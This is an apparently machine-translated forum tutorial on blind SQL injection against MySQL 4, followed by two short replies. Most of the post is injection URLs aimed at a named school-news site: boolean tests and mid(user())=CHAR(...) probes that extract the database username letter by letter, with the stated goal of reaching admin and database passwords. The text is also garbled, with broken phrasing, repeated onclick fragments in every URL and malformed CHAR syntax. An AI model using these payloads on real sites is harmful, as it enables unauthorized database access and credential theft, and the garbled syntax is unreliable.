[tutorials] Sql Injection 4 version (Blind Sql)

[badwolves1986]

before and after his tutor mau love ya a little clubbing
I thank you with GT_portnoy Hn I already love her tutor

let's talk about Blind SQL Injection ..

What is Blind SQL Injection sich tu?

Blind SQL Injection is one technique exploits the different databases with common sql injection sql injection in which the ordinary will issue a value but on blind sql injection techniques will not issue any value but we will find out the values ​​by trial and error will value the / test the values ​​true or falsenya ...

Here we use the command:

mid () = almost the same function as substring ()
char () = is a variable of character

remember .. before trying, we check its version sql .. d tutorials how to check sql inject any other one lg ..
if we use the version 4 .. blind, because v4 does not support querying information_schema

if version 5, this may pake, may pake sql inject normalcy ..

more ...

Target: http://www.smanti.com" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; (given to gt_portnoy bejamz brother and brother gt i love to make the experiment)

1.PENGETESAN BUG

As usual .. follow the previous steps, as in the tutorial SQL Inject yng usual .. looking for a dynamic page, paste and 1 = 0 and and 1 = 1

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and 1 = 0 <<<false

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and 1 = 1 <<<true

it contains bugs eh ...

continued ....

2.BLIND INJECT

Query in use: and mid (user (), 1,1) = CHAR (65)

I explain a little bit ..

mid (user () 1,1) = in this case we do not know the value of what the user is in "()" we are empty and the numbers behind 1.1 () is the order of the values

whereas CHAR is the variable in decimal and (65) is the decimal value.
why we start with 65?
because "65" is "A" in ascii ...

continued ..

let us enter

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (65)

but the result is still false (the story is lost)

means that we enter the wrong value ..

value-added live na .. so ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (66) <<still false

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (67) <<still false

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (68) <<still false

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (69) <<is false as well ..

and so on until we find a state of true (the story appears again)

happened to be in char (83)

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,1) = CHAR (83) <<finally true ..

cape? still strong? hahaha .. trial n error ...

continued ..

i'm add the value ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,2) = CHAR (83.65)

was there any difference?

yep, we raise the number on the user becomes 2 and we add value char back, of 65 ..
..

1.1 = value first user
1.2 = value of both user
1.3 = third value user
etc.
and 83 is true, then we add ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,2) = CHAR (83.65)

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,2) = CHAR (83.66)

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,2) = CHAR (83.67)

etc. .. who until yes true ..

who was hiding in the true value 77

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,2) = CHAR (83.77)


continue its steps continues ..

looking for value k 3 user ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,3) = CHAR (83,77,65)

direct eh .. hehehe .. look

further value k 4 ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,4) = CHAR (83,77,65,65)


http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,4) = CHAR (83,77,65,66)


http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,4) = CHAR (83,77,65,67)

look turns 78 in value ..

http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (user (), 1,4) = CHAR (83,77,65,78)

trus-up wrote ...

I tired ..


.. anyway .. after we can all convert char to ascii table earlier in

http://www.piclist.com/techref/ascii.htm" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;

d stelah convert, it turns out 83 77 65 78 tuh d ascii is SMAN

nah already almost at guess his user name kerjain ndiri y. ... okay

nah .. if would be how the password?

we change the value
user () into a database () and repeat the above tahap2 to get all the values ​​that true ..

so


http://www.smanti.com/berita.php?id=5" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false; and mid (database (), 1,1) = CHAR (65)

the same search again .. like .. looking for a user had to be patient ..

repeat until it can be true ..

add the value

and change the database value () to look for other value ..

to get the admin password and db password
.
blind sql injection method like this requires patience and thoroughness of the attacker to get the nail on the head .. value (true)

however, this method up to now is quite effective for the web that has menfilter crack sql injection ... hehehe ...

sources from here http://devilzc0de.org/forum/thread-11395.html

[ayu]

Was this placed in the pending section first?

In case it wasn't, make sure you read the forum description carefully next time : )

//moved

[Lundis]

This reminds me very much of spam emails.